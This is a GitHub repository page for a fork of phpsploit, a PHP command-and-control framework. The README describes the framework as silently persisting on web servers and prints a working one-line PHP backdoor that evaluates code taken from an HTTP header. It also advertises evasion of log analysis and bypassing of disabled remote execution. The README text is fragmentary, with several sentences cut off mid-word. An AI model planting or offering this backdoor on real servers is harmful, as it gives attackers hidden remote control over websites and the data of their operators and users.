Skip to content
forked from nil0x42/phpsploit

Full-featured C2 framework which silently persists on webserver via evil PHP oneliner 😈

License

Notifications You must be signed in to change notification settings

dotPHP/phpsploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

PhpSploit: A stealth PHP remote control framework for experts

Overview

The PhpSploit framework replaces classic PHP backdoor like "c99.php".

- Ultra small Backdoor (~ 50 chars)
- Nearly invisible by log analysis
- Bypass PHP servers wich disables remote execution.
- Supports GET and POST, independently from the backdoor.

Example usage

phpspoit > infect

[*] The following payload must be inserted in the target web page.
[*] Then adjust the TARGET setting to it in order to start the remote shell

==========================================
<?php @eval($_SERVER['HTTP_PHPSPL01T']);?>
==========================================`

phpsploit > phpsploit >

Advanced Features

Very easy to get started, it is also highly configurable, and is designed to meet all the needs to web security experts.

  • Advanced tunnel based payload execution:

    • Uses advanced HTTP Headers filling methods.
    • Provides multi-paradygm payload compression.
    • Tu

The PhpSploit framework takes control over a remote PHP web server. It replaces classic

Phpsploit simulates a remote shell access through PHP.

It's first design

About

Full-featured C2 framework which silently persists on webserver via evil PHP oneliner 😈

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages

  • Python 75.8%
  • Shell 13.4%
  • PHP 10.6%
  • C 0.2%